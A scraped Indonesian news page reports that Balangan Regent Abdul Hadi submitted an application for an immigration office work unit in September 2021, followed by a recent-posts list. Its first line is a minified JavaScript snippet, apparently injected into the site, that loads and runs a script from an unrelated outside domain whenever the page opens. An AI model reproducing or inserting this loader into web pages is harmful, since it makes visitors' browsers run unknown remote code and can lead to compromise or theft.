(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Balangan

Bupati Abdul Hadi Serahkan Dokumen Permohonan UKK Imigrasi


KANALKALIMANTAN.COM, PARINGIN – Bupati Balangan H Abdul Hadi menyerahkan dokumen permohonan Unit Kerja Kantor (UKK) imigrasi kepada Kepala Bidang Program dan Pelaporan Direktorat Jenderal Imigrasi, Dadan Gunawan di kediaman Bupati Balangan, Rabu (15/9/2021) malam.

Bupati Balangan H Abdul Hadi berharap, saat didirikannya UKK ini dalam tempo dua tahun ke depan berubah menjadi kantor imigrasi ini, dapat membawa dampak yang bagus untuk masyarakat Balangan, baik dari segi ekonomi maupun jumlah orang yang datang ke Balangan.

“Kita sekarang sedang mengembangkan sektor objek wisata, kita mengerjakan beberapa air terjun. Tetapi itu belum tentu dikunjungi oleh orang, tapi kalau kita mendirikan lembaga pasti orang datang bukan hanya kepentingan warga Balangan, tetapi juga kepentingan warga lain,” katanya.

Lebih lanjut disampaikan bahwa, seperti apa yang dikatakan pihak imigrasi, pelayanan ini mengabaikan asas domisili, ini nantinya warga di kabupaten lainnya akan datang ke Kabupaten Balangan. Nantinya investor juga akan berpikir untuk mendirikan hotel di sini, tetapi sekarang kalau mereka mau mendirikan hotel di sini tentunya akan sepi dari pengunjung.

 

Baca juga : Kemenag Balangan Gelar Sosialisasi Percepatan Vaksinasi Covid-19

Selain itu diharapkan akan memberikan multi dampak dari segi ekonomi, dan melengkapi pelayanan di Kabupaten Balangan, warga Balangan boleh dikatakan bangga dari kabupaten tetangga. Karena mereka belum mempunyai unit kerja kantor imigrasi, sedangkan Balangan kabupaten yang masih muda sudah memilikinya.

Kepala Bagian Program dan Pelaporan Direktorat Jenderal Imigrasi Dadan Gunawan, mengatakan, tentunya ini menjadi perhatian dari tahapan permohonan yang dilakukan oleh kepala daerah beserta masyarakat di Kabupaten Balangan, yang sudah mengharapkan kehadiran fungsi kantor imigrasi di Kabupaten Balangan.

“Tentunya aspek-aspek realistis yang kami lakukan adalah melakukan tindak lanjut dari yang sebelumnya sudah dilakukan oleh Kantor Wilayah Kemenkumham sebagai penanggung jawab kegiatan di wilayah Kalimantan Selatan, dengan fungsi divisi keimigrasiannya tentunya kami menindaklanjuti usulan yang dimaksud ada konsep telah yang dibuat,” jelas Dadan.

Terakhir lanjut dia, tentu prasyarat yang ditetapkan oleh Kemenkumham dalam hal ini Direktorat Jenderal imigrasi sudah sampai dimana progresnya, kesiapan itu yang pihaknya diskusikan saat ini bersama pemerintah daerah serta tim dari Kanwil Pusat. (Kanalkalimantan.com/alfi)

Reporter : alfi
Editor : cell


Desy Arfianty

Recent Posts

Hari Museum Internasional 2024 “Museum untuk Pendidikan dan Penelitian”

KANALKALIMANTAN.COM - Hari Museum Internasional yang ditetapkan oleh ICOM dan dirayakan setiap tahun pada tanggal… Read More

5 jam ago

Masrumi dari Desa Sungai Namang HSU Raih Prestasi Nasional

KANALKALIMANTAN.COM, SOLO – Masrumi, guru honorer asal Desa Sungai Namang, Kecamatan Danau Panggang, Kabupaten Hulu… Read More

6 jam ago

Pemkab HSU Gelar Upacara HUT ke-75 Proklamasi ALRI Divisi IV Kalimantan

KANALKALIMANTAN.COM, AMUNTAI - Memperingati HUT ke-75 Proklamasi Pemerintahan Gubernur Tentara ALRI Divisi lV Pertahanan Kalimatan,… Read More

6 jam ago

Mantan Karyawan BPR Candi Agung Amuntai Dituntut 7 Tahun

Selewengkan Dana Nasabah, Rugikan Negara Rp779 Juta Read More

6 jam ago

Ungkap Kasus Curanmor di Banjarbaru, 4 Unit Motor Berplat Merah

7 Pelaku Ditangkap dengan Barbuk 21 Unit Sepeda Motor Read More

10 jam ago

Kontestan Kepala Daerah di Kalsel Ditantang Miliki Visi Majukan Perpustakaan

KANALKALIMANTAN.COM, BANJARMASIN - Tim Tenaga Ahli Gubernur Kalimantan Selatan (Kalsel) melakukan kunjungan ke Dinas Perpustakaan… Read More

12 jam ago

This website uses cookies.